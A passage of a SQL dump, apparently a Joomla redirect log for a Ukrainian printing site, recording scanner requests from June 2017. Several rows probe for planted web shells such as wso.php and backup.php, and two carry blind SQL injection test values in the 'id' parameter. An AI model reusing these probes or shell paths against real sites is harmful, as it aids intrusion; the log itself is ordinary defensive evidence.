00:00:00',301),(10020,'http://ekvatorprint.com.ua/index.php?ctrl=archive&Itemid=119&listid=1&option=com_acymailing',NULL,'http://www.google.com/','',1,0,'2017-06-16 19:36:07','0000-00-00 00:00:00',301),(10021,'http://ekvatorprint.com.ua/administrator/templates/isis/images/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/isis/images/backup.php','',1,0,'2017-06-16 21:10:10','0000-00-00 00:00:00',301),(10022,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/layer/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/layer/config.php','',1,0,'2017-06-16 21:12:20','0000-00-00 00:00:00',301),(10023,'http://ekvatorprint.com.ua/index.php?Itemid=9&option=com_alfcontact',NULL,'http://www.google.com/','',1,0,'2017-06-16 21:24:30','0000-00-00 00:00:00',301),(10024,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_weblinks/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_weblinks/config.php','',1,0,'2017-06-16 23:26:50','0000-00-00 00:00:00',301),(10025,'http://ekvatorprint.com.ua/plugins/system/languagecode/language/en-gb/backup.php',NULL,'http://ekvatorprint.com.ua/plugins/system/languagecode/language/en-gb/backup.php','',1,0,'2017-06-17 00:38:39','0000-00-00 00:00:00',301),(10026,'http://ekvatorprint.com.ua/components/com_users/views/profile/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_users/views/profile/tmpl/config.php','',1,0,'2017-06-17 00:52:52','0000-00-00 00:00:00',301),(10027,'http://ekvatorprint.com.ua/index.php?Itemid=941&lang=ru&option=com_joomsport&sid=1&task=table',NULL,'http://www.google.com/','',1,0,'2017-06-17 02:47:28','0000-00-00 00:00:00',301),(10028,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/advlist/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/advlist/config.php','',1,0,'2017-06-17 02:49:54','0000-00-00 00:00:00',301),(10029,'http://ekvatorprint.com.ua/administrator/components/com_messages/layouts/toolbar/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_messages/layouts/toolbar/config.php','',1,0,'2017-06-17 02:51:54','0000-00-00 00:00:00',301),(10030,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/install/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/install/config.php','',1,0,'2017-06-17 08:04:04','0000-00-00 00:00:00',301),(10031,'http://ekvatorprint.com.ua/administrator/components/com_content/helpers/html/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_content/helpers/html/backup.php','',1,0,'2017-06-17 09:04:50','0000-00-00 00:00:00',301),(10032,'http://ekvatorprint.com.ua/tong.php?login=kmufg',NULL,'','',4,0,'2017-06-17 11:17:12','0000-00-00 00:00:00',301),(10033,'http://ekvatorprint.com.ua/cache/widgetkit/twitter/ftp_pwd.php',NULL,'http://ekvatorprint.com.ua/cache/widgetkit/twitter/ftp_pwd.php','',1,0,'2017-06-17 11:31:54','0000-00-00 00:00:00',301),(10034,'http://ekvatorprint.com.ua/index.php?format=1&Itemid=368&option=com_content&type=rss&view=featured',NULL,'http://www.google.com/','',1,0,'2017-06-17 11:40:33','0000-00-00 00:00:00',301),(10035,'http://ekvatorprint.com.ua/components/com_foxcontact/',NULL,'','',11,0,'2017-06-17 14:38:41','0000-00-00 00:00:00',301),(10036,'http://ekvatorprint.com.ua/components/com_content/views/archive/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/archive/tmpl/config.php','',1,0,'2017-06-17 16:27:19','0000-00-00 00:00:00',301),(10037,'http://ekvatorprint.com.ua/index.php?layout=1&option=com_virtuemart&view=user',NULL,'http://www.google.com/','',1,0,'2017-06-17 18:44:48','0000-00-00 00:00:00',301),(10038,'http://ekvatorprint.com.ua/plugins/content/ini.php',NULL,'http://ekvatorprint.com.ua/plugins/content/ini.php','',5,0,'2017-06-17 18:56:00','0000-00-00 00:00:00',301),(10039,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banners/backup.php','',2,0,'2017-06-17 19:06:07','0000-00-00 00:00:00',301),(10040,'http://ekvatorprint.com.ua/components/com_foxcontact',NULL,'','',1,0,'2017-06-17 20:15:11','0000-00-00 00:00:00',301),(10041,'http://ekvatorprint.com.ua/index.php?id=82:impressum&Itemid=107&layout=default&option=com_content&page=&print=1&tmpl=component&view=1',NULL,'http://www.google.com/','',1,0,'2017-06-17 22:17:35','0000-00-00 00:00:00',301),(10042,'http://ekvatorprint.com.ua/index.php?name=1&option=com_aborange&task=image.getBannerImage',NULL,'http://www.google.com/','',2,0,'2017-06-18 00:03:30','0000-00-00 00:00:00',301),(10043,'http://ekvatorprint.com.ua/administrator/components/com_menus/views/item/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_menus/views/item/backup.php','',1,0,'2017-06-18 10:07:48','0000-00-00 00:00:00',301),(10044,'http://ekvatorprint.com.ua/plugins/editors/jce/tiny_mce/plugins/imgmanager/langs/strcoll_enc-d.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/jce/tiny_mce/plugins/imgmanager/langs/strcoll_enc-d.php','',1,0,'2017-06-18 10:16:31','0000-00-00 00:00:00',301),(10045,'http://ekvatorprint.com.ua/popup-pomo.phpdel',NULL,'http://ekvatorprint.com.ua/popup-pomo.phpdel','',2,0,'2017-06-18 10:26:31','0000-00-00 00:00:00',301),(10046,'http://ekvatorprint.com.ua/index.php?option=com_expert&view=search',NULL,'http://www.google.com/','',1,0,'2017-06-18 10:36:40','0000-00-00 00:00:00',301),(10047,'http://ekvatorprint.com.ua/administrator/components/com_users/views/group/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_users/views/group/backup.php','',1,0,'2017-06-18 10:39:42','0000-00-00 00:00:00',301),(10048,'http://ekvatorprint.com.ua/administrator/modules/mod_version/language/en-gb/config.php',NULL,'http://ekvatorprint.com.ua/administrator/modules/mod_version/language/en-gb/config.php','',1,0,'2017-06-18 14:00:49','0000-00-00 00:00:00',301),(10049,'http://ekvatorprint.com.ua/index.php/component/video/index.php?option=com_expert&view=search',NULL,'http://www.google.com/','',1,0,'2017-06-18 14:07:39','0000-00-00 00:00:00',301),(10050,'http://ekvatorprint.com.ua/components/com_weblinks/views/form/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/views/form/tmpl/config.php','',1,0,'2017-06-18 17:12:15','0000-00-00 00:00:00',301),(10051,'http://ekvatorprint.com.ua/index.php?id=56&Itemid=110&option=com_weblinks&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-18 17:40:31','0000-00-00 00:00:00',301),(10052,'http://ekvatorprint.com.ua/index.php?cid=1:frequency-asked-questions&Itemid=61&option=com_quickfaq&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-18 19:27:13','0000-00-00 00:00:00',301),(10053,'http://ekvatorprint.com.ua/components/com_users/auth.class.php',NULL,'http://ekvatorprint.com.ua/components/com_users/auth.class.php','',2,0,'2017-06-18 20:26:17','0000-00-00 00:00:00',301),(10054,'http://ekvatorprint.com.ua/nuevo/administrator/components/com_akeeba/akeeba.xml',NULL,'http://www.google.com/','',1,0,'2017-06-19 04:13:35','0000-00-00 00:00:00',301),(10055,'http://ekvatorprint.com.ua/servicios/components/com_kunena/template/blue_eagle/template.xml',NULL,'http://www.google.com/','',1,0,'2017-06-19 05:58:36','0000-00-00 00:00:00',301),(10056,'http://ekvatorprint.com.ua/index.php?chronoformname=1&Itemid=4&option=com_chronocontact&task=send',NULL,'http://www.google.com/','',1,0,'2017-06-19 11:16:55','0000-00-00 00:00:00',301),(10057,'http://ekvatorprint.com.ua/index.php?Itemid=&lang=en&newsid=1&option=com_news',NULL,'http://www.google.com/','',1,0,'2017-06-19 16:33:21','0000-00-00 00:00:00',301),(10058,'http://ekvatorprint.com.ua/index.php?country=2&id=1&lang=en&option=com_louts&parent=8',NULL,'http://www.google.com/','',1,0,'2017-06-19 18:17:51','0000-00-00 00:00:00',301),(10059,'http://ekvatorprint.com.ua/index.php?country=1&id=5&lang=en&option=com_louts&parent=4',NULL,'http://www.google.com/','',1,0,'2017-06-19 20:02:34','0000-00-00 00:00:00',301),(10060,'http://ekvatorprint.com.ua/index.php?country=1&id=1&lang=en&option=com_louts&parent=4',NULL,'http://www.google.com/','',1,0,'2017-06-19 21:43:58','0000-00-00 00:00:00',301),(10061,'http://ekvatorprint.com.ua/index.php?lang=en&newsid=1&option=com_news',NULL,'http://www.google.com/','',1,0,'2017-06-19 23:08:48','0000-00-00 00:00:00',301),(10062,'http://ekvatorprint.com.ua/index.php?id=1&lang=en&option=com_louts&parent=4',NULL,'http://www.google.com/','',1,0,'2017-06-20 00:33:14','0000-00-00 00:00:00',301),(10063,'http://ekvatorprint.com.ua/index.php?country=1&id=26&lang=en&option=com_louts',NULL,'http://www.google.com/','',1,0,'2017-06-20 01:58:36','0000-00-00 00:00:00',301),(10064,'http://ekvatorprint.com.ua/index.php?country=2&id=1&lang=en&option=com_louts',NULL,'http://www.google.com/','',1,0,'2017-06-20 03:24:25','0000-00-00 00:00:00',301),(10065,'http://ekvatorprint.com.ua/index.php?id=1&Itemid=31&lang=en&option=com_inneradmin',NULL,'http://www.google.com/','',1,0,'2017-06-20 04:49:20','0000-00-00 00:00:00',301),(10066,'http://ekvatorprint.com.ua/store-locator/index.php?catid=3&Itemid=62&option=com_sobi2',NULL,'http://www.google.com/','',2,0,'2017-06-20 06:14:48','0000-00-00 00:00:00',301),(10067,'http://ekvatorprint.com.ua/index.php?Itemid=54&option=com_seminar',NULL,'http://www.google.com/','',2,0,'2017-06-20 09:02:48','0000-00-00 00:00:00',301),(10068,'http://ekvatorprint.com.ua/index.php/resources/library-catalogue?catid=0&option=com_medialibrary&searchtext=&submit=Search&task=search',NULL,'http://www.google.com/','',1,0,'2017-06-20 16:06:35','0000-00-00 00:00:00',301),(10069,'http://ekvatorprint.com.ua/index.php?id=1&option=com_cfc_cursos&view=una',NULL,'http://www.google.com/','',1,0,'2017-06-20 18:54:38','0000-00-00 00:00:00',301),(10070,'http://ekvatorprint.com.ua/index.php?id=11 AND 3*2*1=6 AND 186=186&limit=9&limitstart=9&option=com_events',NULL,'http://www.google.com/','',1,0,'2017-06-20 20:19:23','0000-00-00 00:00:00',301),(10071,'http://ekvatorprint.com.ua/wp-log-7.php',NULL,'','',3,0,'2017-06-20 20:49:40','0000-00-00 00:00:00',301),(10072,'http://ekvatorprint.com.ua/sample.php',NULL,'ekvatorprint.com.ua','',4,0,'2017-06-20 21:28:53','0000-00-00 00:00:00',301),(10073,'http://ekvatorprint.com.ua/wp-includes/temp.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 21:43:51','0000-00-00 00:00:00',301),(10074,'http://ekvatorprint.com.ua/index.php?id=1&limit=9&limitstart=9&option=com_events',NULL,'http://www.google.com/','',1,0,'2017-06-20 21:45:05','0000-00-00 00:00:00',301),(10075,'http://ekvatorprint.com.ua/wp-admin/network/rnnvhs.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 22:15:58','0000-00-00 00:00:00',301),(10076,'http://ekvatorprint.com.ua/wp-admin/includes/rnnvhs.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 22:16:59','0000-00-00 00:00:00',301),(10077,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/sfn.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 22:37:54','0000-00-00 00:00:00',301),(10078,'http://ekvatorprint.com.ua/libraries/sfn.php',NULL,'ekvatorprint.com.ua','',4,0,'2017-06-20 22:50:27','0000-00-00 00:00:00',301),(10079,'http://ekvatorprint.com.ua/wp-content/uploads/sfn.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 23:05:01','0000-00-00 00:00:00',301),(10080,'http://ekvatorprint.com.ua/index.php?id=11 AND 3*2*1=6 AND 923=923&limit=9&option=com_events',NULL,'http://www.google.com/','',1,0,'2017-06-20 23:11:11','0000-00-00 00:00:00',301),(10081,'http://ekvatorprint.com.ua/wp-content/plugins/sfn.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 23:18:12','0000-00-00 00:00:00',301),(10082,'http://ekvatorprint.com.ua/wp-content/sample.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-20 23:18:55','0000-00-00 00:00:00',301),(10083,'http://ekvatorprint.com.ua/index.php?option=com_events',NULL,'http://www.google.com/','',1,0,'2017-06-21 02:02:54','0000-00-00 00:00:00',301),(10084,'http://ekvatorprint.com.ua/index.php?id=1&limit=9&limitstart=0&option=com_events&order=&title=',NULL,'http://www.google.com/','',1,0,'2017-06-21 04:56:31','0000-00-00 00:00:00',301),(10085,'http://ekvatorprint.com.ua/index.php?id=12&limit=9&limitstart=0&option=com_events&order=1&title=',NULL,'http://www.google.com/','',1,0,'2017-06-21 06:22:41','0000-00-00 00:00:00',301),(10086,'http://ekvatorprint.com.ua/wp-content/uploads/2017/05/yt.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-21 08:53:49','0000-00-00 00:00:00',301),(10087,'http://ekvatorprint.com.ua/wp-inde.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-21 09:07:53','0000-00-00 00:00:00',301),(10088,'http://ekvatorprint.com.ua/wp-content/plugins/temp.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-21 09:11:03','0000-00-00 00:00:00',301),(10089,'http://ekvatorprint.com.ua/wp-content/uploads/yt.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-21 09:12:32','0000-00-00 00:00:00',301),(10090,'http://ekvatorprint.com.ua/wp-cods.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-21 09:18:14','0000-00-00 00:00:00',301),(10091,'http://ekvatorprint.com.ua/wp-content/uploads/temp.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-21 09:19:47','0000-00-00 00:00:00',301),(10092,'http://ekvatorprint.com.ua/modules/modules/temp.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-06-21 09:28:48','0000-00-00 00:00:00',301),(10093,'http://ekvatorprint.com.ua/images/yt.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-21 09:36:29','0000-00-00 00:00:00',301),(10094,'http://ekvatorprint.com.ua/wp-includes/css/temp.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-21 10:23:09','0000-00-00 00:00:00',301),(10095,'http://ekvatorprint.com.ua/rnnvhs.php',NULL,'ekvatorprint.com.ua','',6,0,'2017-06-21 13:32:53','0000-00-00 00:00:00',301),(10096,'http://ekvatorprint.com.ua/index.php?Itemid=24&option=com_apoll&view=apolls',NULL,'http://www.google.com/','',1,0,'2017-06-21 14:39:55','0000-00-00 00:00:00',301),(10097,'http://ekvatorprint.com.ua/index.php?app_id=1&controller=zoofilter&Itemid=102&option=com_zoo&page=1&search_id=168&task=dosearch',NULL,'http://www.google.com/','',1,0,'2017-06-21 20:01:10','0000-00-00 00:00:00',301),(10098,'http://ekvatorprint.com.ua/nhuig.asp',NULL,'','',1,0,'2017-06-22 04:54:43','0000-00-00 00:00:00',301),(10099,'http://ekvatorprint.com.ua/config/AspCms_Config.asp',NULL,'','',1,0,'2017-06-22 04:54:44','0000-00-00 00:00:00',301),(10100,'http://ekvatorprint.com.ua/components/com_banners/helpers/wso.php',NULL,'','',8,0,'2017-06-22 06:14:51','0000-00-00 00:00:00',301),(10101,'http://ekvatorprint.com.ua/index.php?catid=21&Itemid=100042&option=com_contact&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-22 08:32:20','0000-00-00 00:00:00',301),(10102,'http://ekvatorprint.com.ua/templates/j9templates/j9templates.php',NULL,'ekvatorprint.com.ua','',10,0,'2017-06-22 11:38:02','0000-00-00 00:00:00',301),(10103,'http://ekvatorprint.com.ua/modules/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 11:43:08','0000-00-00 00:00:00',301),(10104,'http://ekvatorprint.com.ua/cache/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 11:49:47','0000-00-00 00:00:00',301),(10105,'http://ekvatorprint.com.ua/administrator/templates/khepri/index.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 11:52:16','0000-00-00 00:00:00',301),(10106,'http://ekvatorprint.com.ua/language/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 11:55:42','0000-00-00 00:00:00',301),(10107,'http://ekvatorprint.com.ua/logs/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',20,0,'2017-06-22 11:58:27','0000-00-00 00:00:00',301),(10108,'http://ekvatorprint.com.ua/templates/j7templates/j7templates.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 12:06:20','0000-00-00 00:00:00',301),(10109,'http://ekvatorprint.com.ua/plugins/jplugin/jplugin/j2plugin.php',NULL,'ekvatorprint.com.ua','',10,0,'2017-06-22 12:06:42','0000-00-00 00:00:00',301),(10110,'http://ekvatorprint.com.ua/templates/j11templates/j11templates.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 12:12:10','0000-00-00 00:00:00',301),(10111,'http://ekvatorprint.com.ua/components/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 12:14:17','0000-00-00 00:00:00',301),(10112,'http://ekvatorprint.com.ua/media/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',20,0,'2017-06-22 12:16:35','0000-00-00 00:00:00',301),(10113,'http://ekvatorprint.com.ua/templates/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',13,0,'2017-06-22 12:26:12','0000-00-00 00:00:00',301),(10114,'http://ekvatorprint.com.ua/tmp/thumbsj3tmp/img.resize.php',NULL,'ekvatorprint.com.ua','',12,0,'2017-06-22 12:26:58','0000-00-00 00:00:00',301),(10115,'http://ekvatorprint.com.ua/templates/jtemplates/jtemplates.php',NULL,'ekvatorprint.com.ua','',11,0,'2017-06-22 12:30:27','0000-00-00 00:00:00',301),(10116,'http://ekvatorprint.com.ua/images/stories/gass.php',NULL,'','',8,0,'2017-06-22 12:38:09','0000-00-00 00:00:00',301),(10117,'http://ekvatorprint.com.ua/component/jnews/mailing/archive/Itemid-999/listid-1/index.php?act=mailing&option=com_jnews',NULL,'http://www.google.com/','',1,0,'2017-06-22 13:52:58','0000-00-00 00:00:00',301),(10118,'http://ekvatorprint.com.ua/index.php?catid=1&id=126:5-quartiers&Itemid=256&option=com_content&view=article',NULL,'http://www.google.com/','',1,0,'2017-06-22 15:39:43','0000-00-00 00:00:00',301),(10119,'http://ekvatorprint.com.ua/components/com_content/views/category/tmpl/update.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/category/tmpl/update.php','',2,0,'2017-06-22 17:29:47','0000-00-00 00:00:00',301),(10120,'http://ekvatorprint.com.ua/administrator/components/com_newsfeeds/tables/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_newsfeeds/tables/backup.php','',2,0,'2017-06-22 17:31:06','0000-00-00 00:00:00',301),(10121,'http://ekvatorprint.com.ua/changelog.php',NULL,'http://ekvatorprint.com.ua/changelog.php','',3,0,'2017-06-22 18:26:32','0000-00-00 00:00:00',301),(10122,'http://ekvatorprint.com.ua/administrator/components/com_categories/helpers/html/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_categories/helpers/html/backup.php','',2,0,'2017-06-22 18:27:30','0000-00-00 00:00:00',301),(10123,'http://ekvatorprint.com.ua/administrator/components/com_media/models/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_media/models/backup.php','',2,0,'2017-06-22 18:27:33','0000-00-00 00:00:00',301),(10124,'http://ekvatorprint.com.ua/index.php?catid=79:renouvellement-urbain&id=126:5-quartiers&Itemid=1&option=com_content&view=article',NULL,'http://www.google.com/','',1,0,'2017-06-22 19:15:52','0000-00-00 00:00:00',301),(10125,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/pascal/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/pascal/config.php','',2,0,'2017-06-22 19:24:20','0000-00-00 00:00:00',301),(10126,'http://ekvatorprint.com.ua/libraries/joomla/form/fields/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/form/fields/backup.php','',2,0,'2017-06-22 19:27:53','0000-00-00 00:00:00',301),(10127,'http://ekvatorprint.com.ua/images/py.php',NULL,'http://ekvatorprint.com.ua/images/py.php','',2,0,'2017-06-22 19:28:36','0000-00-00 00:00:00',301),(10128,'http://ekvatorprint.com.ua/images/green.php.suspected',NULL,'http://ekvatorprint.com.ua/images/green.php.suspected','',2,0,'2017-06-22 20:18:39','0000-00-00 00:00:00',301),(10129,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/views/history/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/views/history/config.php','',2,0,'2017-06-22 20:23:38','0000-00-00 00:00:00',301),(10130,'http://ekvatorprint.com.ua/w.php',NULL,'','',10,0,'2017-06-22 20:55:10','0000-00-00 00:00:00',301),(10131,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/z80/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/z80/config.php','',2,0,'2017-06-22 21:18:22','0000-00-00 00:00:00',301),(10132,'http://ekvatorprint.com.ua/libraries/joomla/github/package/users/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/github/package/users/backup.php','',2,0,'2017-06-22 21:18:38','0000-00-00 00:00:00',301),(10133,'http://ekvatorprint.com.ua/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/logo_img.php.suspected','',7,0,'2017-06-22 21:18:50','0000-00-00 00:00:00',301),(10134,'http://ekvatorprint.com.ua/components/com_content/views/featured/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/featured/tmpl/config.php','',2,0,'2017-06-22 21:19:22','0000-00-00 00:00:00',301),(10135,'http://ekvatorprint.com.ua/engine/engine.php',NULL,'ekvatorprint.com.ua/engine/engine.php','',1,0,'2017-06-22 21:46:33','0000-00-00 00:00:00',301),(10136,'http://ekvatorprint.com.ua/components/com_jce/editor/libraries/img/config.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/libraries/img/config.php','',2,0,'2017-06-22 22:14:46','0000-00-00 00:00:00',301),(10137,'http://ekvatorprint.com.ua/index.php?option=com_mercyform&task=process_registration',NULL,'http://www.google.com/','',1,0,'2017-06-22 22:50:52','0000-00-00 00:00:00',301),(10138,'http://ekvatorprint.com.ua/plugins/content/apismtp/mysql.php',NULL,'http://ekvatorprint.com.ua/plugins/content/apismtp/mysql.php','',8,0,'2017-06-22 23:12:52','0000-00-00 00:00:00',301),(10139,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/database/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/database/config.php','',2,0,'2017-06-22 23:12:54','0000-00-00 00:00:00',301),(10140,'http://ekvatorprint.com.ua/phpmail/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/phpmail/popup-pomo.php','',21,0,'2017-06-22 23:12:55','0000-00-00 00:00:00',301),(10141,'http://ekvatorprint.com.ua/themes/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/themes/popup-pomo.php','',5,0,'2017-06-22 23:14:06','0000-00-00 00:00:00',301),(10142,'http://ekvatorprint.com.ua/components/com_jce/editor/extensions/aggregator/vimeo/htaccess.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/extensions/aggregator/vimeo/htaccess.php','',2,0,'2017-06-23 00:04:33','0000-00-00 00:00:00',301),(10143,'http://ekvatorprint.com.ua/look.php.suspected',NULL,'http://ekvatorprint.com.ua/look.php.suspected','',4,0,'2017-06-23 00:04:36','0000-00-00 00:00:00',301),(10144,'http://ekvatorprint.com.ua/libraries/joomla/language/stemmer/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/language/stemmer/backup.php','',2,0,'2017-06-23 00:05:12','0000-00-00 00:00:00',301),(10145,'http://ekvatorprint.com.ua/administrator/components/com_languages/models/forms/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/models/forms/config.php','',2,0,'2017-06-23 00:05:23','0000-00-00 00:00:00',301),(10146,'http://ekvatorprint.com.ua/modules/mod_stat/mod_stat.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_stat/mod_stat.php.suspected','',5,0,'2017-06-23 01:04:18','0000-00-00 00:00:00',301),(10147,'http://ekvatorprint.com.ua/maint/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/maint/popup-pomo.php','',7,0,'2017-06-23 01:57:57','0000-00-00 00:00:00',301),(10148,'http://ekvatorprint.com.ua/administrator/components/com_media/views/imageslist/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_media/views/imageslist/config.php','',2,0,'2017-06-23 02:50:04','0000-00-00 00:00:00',301),(10149,'http://ekvatorprint.com.ua/components/com_content/views/frontpage/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/frontpage/tmpl/config.php','',2,0,'2017-06-23 02:50:26','0000-00-00 00:00:00',301),(10150,'http://ekvatorprint.com.ua/administrator/components/com_newsfeeds/views/newsfeeds/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_newsfeeds/views/newsfeeds/config.php','',2,0,'2017-06-23 02:52:06','0000-00-00 00:00:00',301),(10151,'http://ekvatorprint.com.ua/install/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/install/popup-pomo.php','',17,0,'2017-06-23 02:52:10','0000-00-00 00:00:00',301),(10152,'http://ekvatorprint.com.ua/agl/index.php?Itemid=21&option=com_faq&view=faq',NULL,'http://www.google.com/','',1,0,'2017-06-23 04:10:06','0000-00-00 00:00:00',301),(10153,'http://ekvatorprint.com.ua/plugins/content/settings.php',NULL,'http://ekvatorprint.com.ua/plugins/content/settings.php','',3,0,'2017-06-23 07:26:51','0000-00-00 00:00:00',301),(10154,'http://ekvatorprint.com.ua/agl/index.php?Itemid=8&option=com_enquiry&view=Contactus',NULL,'http://www.google.com/','',3,0,'2017-06-23 12:55:24','0000-00-00 00:00:00',301),(10155,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/nonbreaking/htaccess.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/nonbreaking/htaccess.php','',2,0,'2017-06-23 19:15:04','0000-00-00 00:00:00',301),(10156,'http://ekvatorprint.com.ua/index.php?id=35:gebera-gutachten&Itemid=56&option=com_rubberdoc&view=1',NULL,'http://www.google.com/','',1,0,'2017-06-23 21:39:15','0000-00-00 00:00:00',301),(10157,'http://ekvatorprint.com.ua/yjh.php',NULL,'','',3,0,'2017-06-23 22:13:55','0000-00-00 00:00:00',301),(10158,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/filters/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/filters/config.php','',1,0,'2017-06-24 01:15:31','0000-00-00 00:00:00',301),(10159,'http://ekvatorprint.com.ua/wp-cokd.php',NULL,'','',4,0,'2017-06-24 04:41:58','0000-00-00 00:00:00',301),(10160,'http://ekvatorprint.com.ua/index.php?current_url=httpbwg_dotsbwg_slashbwg_slashwww.agnez.plbwg_slashstrony-internetowe-e-sklepy-czestochowa-warszawa.html&enable_comment_social=0&enable_image_ctrl_btn=1&enable_image_facebook=0&enable_image_filmstrip=1&enable_image_fullscreen=1&enable_image_google=0&enable_image_pinterest=0&enable_image_tumblr=0&enable_image_twitter=0&gallery_id=1&image_effect=fade&image_filmstrip_height=70&image_height=800&image_id=72&image_width=1200&open_with_fullscreen=0&option=com_gallery_wd&order_by=asc&popup_enable_info=0&popup_enable_rate=0&popup_hit_counter=0&popup_info_always_show=0&slideshow_interval=5&sort_by=order&theme_id=1&thumb_height=300&thumb_width=300&view=gallerybox&watermark_type=none',NULL,'http://www.google.com/','',1,0,'2017-06-24 06:27:12','0000-00-00 00:00:00',301),(10161,'http://ekvatorprint.com.ua/wp-content/themes/brainstorm/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/brainstorm/style.css','',4,0,'2017-06-24 09:34:18','0000-00-00 00:00:00',301),(10162,'http://ekvatorprint.com.ua/index.php?Itemid=339&limitstart=20&option=com_jak2filter&view=itemlist&xf_1=3&xf_2=1',NULL,'http://www.google.com/','',1,0,'2017-06-24 13:30:34','0000-00-00 00:00:00',301),(10163,'http://ekvatorprint.com.ua/index.php?format=feed&Itemid=339&option=com_jak2filter&type=atom&view=itemlist&xf_1=1&xf_2=9',NULL,'http://www.google.com/','',1,0,'2017-06-24 15:17:07','0000-00-00 00:00:00',301),(10164,'http://ekvatorprint.com.ua/index.php?format=feed&Itemid=339&option=com_jak2filter&type=atom&view=itemlist&xf_1=3&xf_2=1',NULL,'http://www.google.com/','',1,0,'2017-06-24 17:02:38','0000-00-00 00:00:00',301),(10165,'http://ekvatorprint.com.ua/index.php?Itemid=339&option=com_jak2filter&view=itemlist&xf_1=1&xf_2=9',NULL,'http://www.google.com/','',1,0,'2017-06-24 18:43:27','0000-00-00 00:00:00',301),(10166,'http://ekvatorprint.com.ua/index.php?ct=&Itemid=21&md=sendpassw&option=com_aclassf',NULL,'http://www.google.com/','',1,0,'2017-06-24 21:33:08','0000-00-00 00:00:00',301),(10167,'http://ekvatorprint.com.ua/index.php?id=40:2009-10-19-12-08-32&Itemid=65&option=com_content&view=category',NULL,'http://www.google.com/','',2,0,'2017-06-25 01:49:21','0000-00-00 